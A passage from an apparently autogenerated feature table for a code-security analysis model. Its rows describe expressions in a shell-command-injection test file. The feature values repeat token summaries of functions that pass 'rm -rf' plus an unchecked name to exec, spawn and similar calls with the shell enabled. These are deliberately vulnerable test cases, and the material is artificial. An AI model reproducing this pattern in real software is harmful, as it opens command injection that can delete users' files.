last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:2:428:70 | spawn(" ... WN_OPT) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:2:428:70 | spawn(" ... WN_OPT) | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:2:428:70 | spawn(" ... WN_OPT) | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:2:428:70 | spawn(" ... WN_OPT) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:8:428:11 | "rm" | CalleeFlexibleAccessPath | spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:8:428:11 | "rm" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:8:428:11 | "rm" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:8:428:11 | "rm" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:8:428:11 | "rm" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:8:428:11 | "rm" | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:8:428:11 | "rm" | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:8:428:11 | "rm" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:14:428:18 | build | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:14:428:18 | build | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:14:428:18 | build | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:14:428:18 | build | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:14:428:18 | build | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:14:428:58 | build(" ... + '-') | CalleeFlexibleAccessPath | spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:14:428:58 | build(" ... + '-') | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:14:428:58 | build(" ... + '-') | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:14:428:58 | build(" ... + '-') | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:14:428:58 | build(" ... + '-') | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:14:428:58 | build(" ... + '-') | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:14:428:58 | build(" ... + '-') | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:14:428:58 | build(" ... + '-') | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:14:428:58 | exceptional return of build(" ... + '-') | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:14:428:58 | exceptional return of build(" ... + '-') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:14:428:58 | exceptional return of build(" ... + '-') | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:14:428:58 | exceptional return of build(" ... + '-') | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:14:428:58 | exceptional return of build(" ... + '-') | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:20:428:25 | "node" | CalleeFlexibleAccessPath | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:20:428:25 | "node" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:20:428:25 | "node" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:20:428:25 | "node" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:20:428:25 | "node" | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:20:428:25 | "node" | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:20:428:25 | "node" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:28:428:51 | (name ? ... ' : '') | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:28:428:51 | (name ? ... ' : '') | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:28:428:51 | (name ? ... ' : '') | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:28:428:51 | (name ? ... ' : '') | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:28:428:51 | (name ? ... ' : '') | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:28:428:51 | (name ? ... ' : '') | stringConcatenatedWith | -endpoint- '-' | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:28:428:57 | (name ? ... ) + '-' | CalleeFlexibleAccessPath | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:28:428:57 | (name ? ... ) + '-' | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:28:428:57 | (name ? ... ) + '-' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:28:428:57 | (name ? ... ) + '-' | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:28:428:57 | (name ? ... ) + '-' | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:28:428:57 | (name ? ... ) + '-' | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:28:428:57 | (name ? ... ) + '-' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:29:428:32 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:29:428:32 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:29:428:32 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:29:428:32 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:29:428:32 | name | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:29:428:32 | name | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:29:428:32 | name | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:29:428:32 | name | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:29:428:32 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:29:428:32 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:29:428:50 | name ? ... :' : '' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:29:428:50 | name ? ... :' : '' | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:29:428:50 | name ? ... :' : '' | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:29:428:50 | name ? ... :' : '' | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:29:428:50 | name ? ... :' : '' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:36:428:39 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:36:428:39 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:36:428:39 | name | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:36:428:39 | name | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:36:428:39 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:36:428:39 | name | stringConcatenatedWith | -endpoint- ':' | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:36:428:45 | name + ':' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:36:428:45 | name + ':' | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:36:428:45 | name + ':' | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm 